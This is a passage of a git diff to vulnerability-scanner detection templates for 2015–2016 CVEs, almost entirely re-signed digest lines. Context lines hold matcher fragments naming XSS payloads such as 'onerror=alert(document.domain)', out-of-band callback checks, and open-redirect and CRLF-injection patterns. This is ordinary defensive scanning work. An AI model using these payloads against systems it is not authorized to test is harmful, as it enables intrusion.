4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206499e057c9d3a3e47b97921bc97140a1c6c2665c3f88b9aecdab84e783acc5a1022100f3638d8b005bcf951cc4bcef477dac5cf3438494276100d7cb26b6701140db28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index 24ac9ef8b7..162581dcbb 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "<img src=x onerror=alert(document.domain)")' - 'contains(body_2, "newstatpress")' condition: and -# digest: 490a0046304402205bcbc563f9a088df9453252c0f326cd0dd26ee9c902cb7f4be973252416080f70220106d8074e730ef5e3f11ecfe53d7ce09c13fe4e22c4afcafd9439def56726a03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220037d8f0bfcb38c7129786dee63ddb500a58c16761f4ce70ef0193c8f7f20b0310221009fed2f7d8acb83f7524e7ac38840dc841af14e6d78431c131dc5131b2b1502bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 2a0210fefb..e3d78373a4 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c27236f98002c3fa3feb31b6084010a0885416d66e5f558006f1e087f2c42369022100de53fe3a0f1b9880b34c9db76ee96cd7e8fe47827ba3e6701ed0c0cd911b5942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml index ecfc655446..53d2678193 100644 --- a/http/cves/2015/CVE-2015-9480.yaml +++ b/http/cves/2015/CVE-2015-9480.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b6c0951be97607789304e920c017d4688b1910f346389d67f4cd410a0fd8dd0022100a8479311b48571c59e35a2d0bff7ccb7a5fe58be76c4cbe82b6491b1b2d6709b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca3463b6480386c127ceead01d1fba65f58939cbca13de5c6b43f2854051505602205e021914f8bbc4cbc1e20b1f3606f0de3d47057ae412735e8e96fe3679a545f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 6f4242a870..471468b2a2 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c01000f7bfc95e33eb45dbcf5a4712b3572527055ecccd3e2921db31c171f3d022069b7039ef57b710a12d2dc565f13665a6328eb7756d5e5304a82666df5c05520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047e5bc89fdc028eecb6accc82d9d3416b1743e3d963544f9c7cde9519145db2c022037c360ddf63f09a4574f54b3c6e88b3d5609a5f85dec9c98b70ecb821e7be7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml index 958d600173..f40b9e4e12 100644 --- a/http/cves/2016/CVE-2016-1000126.yaml +++ b/http/cves/2016/CVE-2016-1000126.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220013dac67a4811933161dbe03eead3bef250ae8d02feba5efd6d39f42544d64e6022100ca5ea281b37719f80730ff5798e2b6963bfd85356337dadb64d627acd3dc86ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbf7fb39a9c96b66e0097ca1b13334f89580f737e1ebc73a5e922955b3f566e022032db892d07e36bafcd44def2576c4dbea52b88b5e4efc6e474a9812f051140b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml index 819cd9a4da..1a8d355c70 100644 --- a/http/cves/2016/CVE-2016-1000127.yaml +++ b/http/cves/2016/CVE-2016-1000127.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201fa95a038bca7a976d180543ed0e6ed4a47bd232e52e238bbde22284bb929c9502210084219362e0fc7b0176f542d1b9573a5aae5160e1b35b267dd8bf34f6a4cb1a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066ba8a22f14b3e0c57fd136eda6a64628f189a3c0897b09a393c482aeda8cf30022100db804a0cfa3ff0731ece561abe335e1f8003a90341dcb8a314ae4543120ab828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml index ddc90d9a85..fc0fa74dd2 100644 --- a/http/cves/2016/CVE-2016-1000131.yaml +++ b/http/cves/2016/CVE-2016-1000131.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220407a865ce50567b9cfec98ff87801912e6a450a0cc7cb90608a2bcefb09326e2022100fa66ee427289bd34d36b90328ed3dd597de4413ef0023d1b1b6f5ff54f0bd5f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea6ef4d537b1bd7a8f833f12df4da179f34a4f2624dfd7c9890117ff33b055b302206b7f2cdcb13852434928d5cd1d0b91a4ca04e65dc76bdaf79e10357bf77a6bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index d2a6bff841..5dab7dd47a 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f92c4af7bff7cdc26614302a343a2e292a63ffc3dc760a557d3dc5522c84de2a02205c0c45f3fce04749913d9d7e88fb5392529bd0a5afaff6cee77e413325bd531f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c99fea519cda5eafa614700d77b99e359161f4f3af3c183aba7568f3871c940702210089a4d6d77ffef79d9f754d6e768dd69a0274d8925ddda02d058ca54bda2fc2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 2264face94..3329ca918e 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ca078885ee89701b0101c68c31266741248f0cd91d17638c44938f0ecc86fc99022100eeb3152a54e3fc1c80a725aa1880ad8ac60b32cc41a7f52f9b9f05f9b96e21c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec25e6281060d9339067044f5110e8613194f364b3fee806ba5124a7cdca4dbf02207bbf5ebac1e11b387d6db81dcaf382b7d21f7c0b651cbbe19b4a127052c19a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 770118966e..34be76c15a 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f497916921501b875878ceba1666d2f55f9f59aa773a30aeb759dbd9ff49d05022015296c72674c1a9c191771b6e5c5d9e61676c016ac61ea6c0aec7b45e2249bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ccb36889b8796180c158af5d053cddea2edbd1a802d93fba5f3017279b8bbc4022100a0fea68147acf7638f88337db9baec2750f479b63bc5e74200ff71c9311cf693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index f5ce2fac75..75ea4696c2 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207b38e136a9969ec1f99831e2c7263ca370a24726ca3e1456694b26bb08f2409a022071798757cb48c00cf6d507e23b12a5e1043e8a2142eac179e3c60b0ae9e862a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf315e4e4b2acd440fce1661b0a78ad199ea7a5208c22039c4b52b2bb7549e6d022100f2a8260024b23ce01882cce685ab0ad2c6c3436d0a96e82e011e398729ce62a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index bbf7656d47..94c22a42c1 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220034124fd53f359794e6e238c8b5b1ab2197fdc51283ea8dd11cf6ddd8fa4df6e02203120eabbf0438bac3e922f39a39edc6ae6c7f924e34a83e237574aa8a1b653c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f116555a765ecc01ed0d4e58b0b862c5dd7e61b4d320431a29a12fab781482c902210087de7745ed7f4e466ed4bd28e2964b67f05bce0967bf45893ecd25893d347c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 9f372ca8b6..4e63553106 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af55ea8a75b6507ffcd4de783bab308e5528311e23b88402b155f7aae52edf1402204a26ad1fb718e585ab042d394312047068437b70d56e60201ba94d88d9008ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220700386522ffe5ddfc1a30a6047ae315fc8d1389e1039d14957ae852f08210f76022100c6111d1efffc8cd422bfade29fbd1c4978558677912eda2687b36b1c62d1cf14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index e2ac7a2657..adae5de88a 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d334015dd9ba6694bdd6bdab650cd81364fbff781687d1005f962218ed50097702201592398ce3d811966592a2774ad808225c335516750c7244e8b1b1297a53c079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009029953295349c4e81b6d0d11d5a6600ebf0d90eef2e32d78143414e9387e9d0221008b132abf1f395a139dd3aa0eefe38486054ca70209f01bdb8990d7e83b7318a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 4bdcd73d1c..f79d3fc41b 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010b00e1e03da20057e11b9152c3ec9cdd135118a3e22499c4c9cc622d550ce2b0221008caf70e5704962de26782ade15ec49d697a240e0312070326cabc183e25e3137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca2b31ff2f83ccd4ee6513321136f5020f5ea49549298a2369adb8c54ae01be8022100bf02254bf633a2592d0ebb3da302b02c9b8467787e456b74002e6d8329caba18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 75a648142a..9f3ac293c7 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4e31a8e20f62df5ed1fbd6d516cf3aaac3613b05365f1a879d1f172e75a75ac022047808d416888877371ac41b66272a681fb7cfc3d4a34a4d165f6e1671ee51dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028714ab0ae776313a89a1a83d16078998420d0259c83dd9245278a1885f94e0302210083dac941158df2bbe47e48107a7ec08600a8434ffe56950ecaebae644b436ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index d98cfcbb75..e07a31526d 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -65,4 +65,4 @@ http: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009528ca4f67e11fbcd8b18e6d2efb805ce25f9d0788175537480cb1bdab15695702203bcd33bb55f89932547aeddf042d65ba26776ced89eff267fb4f2424f2eec0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 702f68e8a6..19cf472b00 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -45,4 +45,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220351cffb23009540be03abde85635acf590303ae2297d629b88db27a7d1d7cff802200127e1f9ffee3c57b152667745d8dce32de3fc3978f3831ddebe3b7809c8897b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 928b20a505..e1a3875b5a 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064a357e04bfbda7eb1c4bbea5da2de7e8f09f1f848068a06e4d55b7cb2497fda022100ade13f3934e3425bb93c2be505bd6aec8eeec5ed9fc69c84515e92da8a4d3d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index fed3c400cf..f99d4589fe 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f475aa06b90130e2b8e28420ca4e0e3d4b009c40aa6a2f5424c85eb78dd4a0790221009c477bdc34bc528ca9464c768743191bbeb359f13af23fc1671c883716c0c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 1c4eb8cc3d..c777e69f54 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100948052a5f3f4171269d27e8daf23f0aca9164b893bf2822e7c0d2db498ab1d39022100fe953696d9917f183fc424ce4c326a4de79ff5cd78483a6e718be65ce5da853d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 185382a673..c1ba89ba21 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fc3986ae66d40990e4a31f02cda6025e0cf6c150b726abb5ee64d8b910edf6022030737c9f147c5262287ddeb3743d846c5b60018f119a3e2ca38e94b557e03376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 9f95b59b3d..2a721c1141 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -48,4 +48,4 @@ http: status: - 200 - 500 -# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220538fc9ea958512767f2d8fe5e57e99b3b4b808a9034b6cf8f3c478c6274aad010220449e8eb0d19a0ee9a4d3baa931168afff6b0a7b8460414d2689d358e61a2688f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index fcfe76565d..f2782f9f85 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220794dbf512a1810009e7cd3e7bbb640cd76c0dc11d6c8f18bd09c931247485bc0022100e47ff8d6c0f657e433480f8453d0ef5bdb478696a22d503a10f7fb8a3976a91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 8ab955c6c9..7c8f173112 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edeeec357936c76c423de1da0e437b54e39b127084bf49d257d6fa40404537df02201b36b8f48e27504b38ea201e03181d77572ba400564be65921717a8b78a39809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 7a9eaff751..e49e1523c5 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204478df4d956ba1393b007b7d82f7002f9054f7f3b400190b8bf3097228d2735602207904edcf73de6619898d2e0d33cca582c04caa2d5a5d8003959520e439b8b17a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 2536246317..1010f351b1 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0f5edb9dcfae071996574d4771f5371c930a81397ba6ea0d0f78b9df79b08610221009b7dc008da8799de3136a1311363e64efd38638efad47a5815f744dd08597efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 868ea59f72..1e8267e001 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e0c0977c90d53736ce085938540079399fabd48a44beef5157e6f31f744aa3c022031ced870037d1b5f6dec56a3f31e42b00f7ab652b7ca75d399fa15ba4b69c094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 3312c41296..37dde34469 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -50,4 +50,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c55b0a4fd5097a215978a5b6010a918d459649c22eb4f1d753883da6f7b60e02210098985705a0228a24548b6efdeb0a9100b39af508de90ebf72528e0588f18cc75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 2ebddc1154..087874bbff 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b929553c26a8f5f0f26c3c88587748b9c2a2d2b3275fe12c5f9857e9cede65f5022100c799a6da8b81f359e5defd40655ff8a8351a0246c207ea9b754815cdbd2cf78d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 4c3713b555..aba4c78863 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f08206705552f730f7ad4e065175ade78aef2f56aeb31207f7f6cd92a2fadde022100d8eb6efe698663c3131c0423b0bde31d4866d579618b0cbfd46e9a507fea4b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 80c8c993fb..5b46f4904b 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -49,4 +49,4 @@ http: - "contains(body_2, 'Debugging Center')" - "contains(body_2, 'Windows IP')" condition: and -# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206fcc24413a4fab283dc7fd59efec560e4a1f7cd9cd5bf6ac8dd51f41ca604dda02210083c5fd74de3024e39a4fb365680ecbe183fbb381fc280030d510b36eedf92484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 31fe431833..38d141f86c 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -58,4 +58,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060d3b74c5e345660298a1474ea851ac0cdc6ed4d1be4c5e2cd84a49e2e79e06b0221008e2275a92a46a7525b4adc185cd37e7990f5b597f4217db969e2c4dc9a9f78db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 2728c52e37..a632a4e242 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205edf4891203be2e982cb79823b11b89eb92d074d01b239e68fc73f47ff65a61702204967e0b4fc76d68dc0ff070d2513427e927cd8dafc5ab0c6c40780cd82096d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 0aa33cf5a9..647d30f54d 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220108a509775dbaa87cc9ebc37fab6c4b29677f6ebba3b97c59dfc4a9599163916022100d5b68a149a425c74e250465df013918c58ca05d995f34ef2e1a43ed5aec34bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index c98637a9a2..08f0b059a6 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ 